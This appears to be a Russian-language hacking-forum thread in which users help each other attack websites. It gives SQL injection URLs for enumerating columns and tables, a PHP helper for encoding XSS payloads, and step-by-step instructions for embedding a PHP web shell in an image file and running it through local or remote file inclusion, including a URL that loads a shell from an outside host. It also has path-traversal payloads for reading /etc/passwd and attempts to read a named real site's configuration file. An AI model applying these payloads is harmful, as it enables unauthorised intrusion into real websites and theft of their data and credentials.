http://www.site.org/article.php?id=80+or+1=(SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1)-- При подстановке любого числа в лимит выдаёт одну и ту же страницу. http://www.site.org/article.php?id=80+order+by+4 Полей *якобы* 4. http://www.site.org/article.php?id=80+union+select+1,2,3,4 The used SELECT statements have a different number of columns Пробывал по всякому,но ничего не вышло.Версия пятая,mysql точно,ибо в ответе сказано,что это mysql.Комменты /* не принимает,что меня,кстати,удивило.(Принимает только -- )
у меня такой вот вопрос, может не совсем по теме, но все-же нужно для эксплотирования уязвимости. Как перевести обыкновенные символы (допустим <script>123</script> в код, типа ??? Припомощи какой проги это делатся? Мне просто нужно будет и скрипты и URL в такой код перевести.
PHP: <? if (!isset($_GET['a'])) { die('?a=string'); } $a = $_GET['a']; $len = strlen($a); $b = ''; for($i = 0; $i < $len; $i++) { $b = $b.'%'.dechex(ord($a[$i])); } echo $b."\r\n"; ?>
Вообщем вопрос, как залить шелл картинкой, нираз читал про это, поидеи что нам нужно так это изменить код картинки и иметь где либо на сайте баг для исполнения пхп кода?
Берёшь обычную .gif/.png/.jpg картинку, открываешь любым HexViewer'om или Notepad++ (им кстати удобней), и после того что там уже изачально было (сигнатура и прочее гомно), добавляешь .php код. Далее заливаешь на нужный тебе сайт, и если там есть локальный инклуд (для ремоута сразу проще ссылку на шелл вбить), прописываешь путь до твоей картинки на сайте. При выполнении функций include()/include_once() .php код выполнится, в каком бы расширении файла он не находился.
1. Надо ли код картинки оставлять? или просто php код дописать в конце? 2. Можно ли с yandex.naroda.ru делать? например http://lol.ru?page=http://yandex.narod.ru/zloyshell.jpeg ? 3. Вот инклуд с ../../../etc/passwd как определяется кол-во ../../../ ? 4. как распознать удаленый инклуд от локального?
1. 2. можно, если удаленный инклюд 3. зависит от количества заданных каталогов в параметре. Т.е. если изначально запрос include(/var/www/domain/vasya.ru/$page) то кол-во .. будет равно 4. Но переборщить с .. нельзя) т.е. если в этом примере ты напишешь 30 .., то хуже не будет выше корня не уйдешь. 4. Пробуешь открыть скрипт, расположенный на др. сервере, если не открывает, то или отключено, или инклуд не удаленный.
спс всем! %) а на счет админки http://www.mirf1.ru/ как или какими прогамми можно узнать строение сайта?
>> как или какими прогамми можно узнать строение сайта? Сканеры head заголовков и прочего гомна. А вообще http://madnet.name/tools/madss/
Каталоги помому ваще фигня - можно сделать ../../../../../../../../../../etc/passwd или ../etc/passwd и все равно выдаст тот же фаил, если он есть)
Бред написал. Т.е. по твоему будет одноxуйственно? include("/usr/blablabla/public_html/".$include_dir."blabla.php"); и include("/usr/".$include_dir."blabla.php"); И при запросе mda.php?include_dir=../../../etc/passwd%00 В обоих случаях выведет etc/passwd? Не стоит писать херню
причем тут # это тоже самое что и -- подставляй чтот тип.. '+union+select+1,2/* а вообще намного удобние производить иньекцию здесь:
Есть сайт: Code: http://www.bikemaster.ru/admin/htmlarea/popups/lister.php?DPI=96&action=view&path=&file=.. Позволяет смотреть директории изображений. SQL иньекцию прикрыли наглухо. И самое интересное - на следующий день после ее обнаружения (када спать уже пошел и сил небыло ничего делать.) Перебрасывает на главную страницу при любой попытке запроса. Файл конфигурации includes/configure.php просто так не просмотреть. Пробовал так: Code: http://www.bikemaster.ru/admin/htmlarea/popups/lister.php?DPI=96&path=../../../../includes/configure.php , но сам файл никак не посмотреть. Кто-нибудь может что-нибудь подсказать?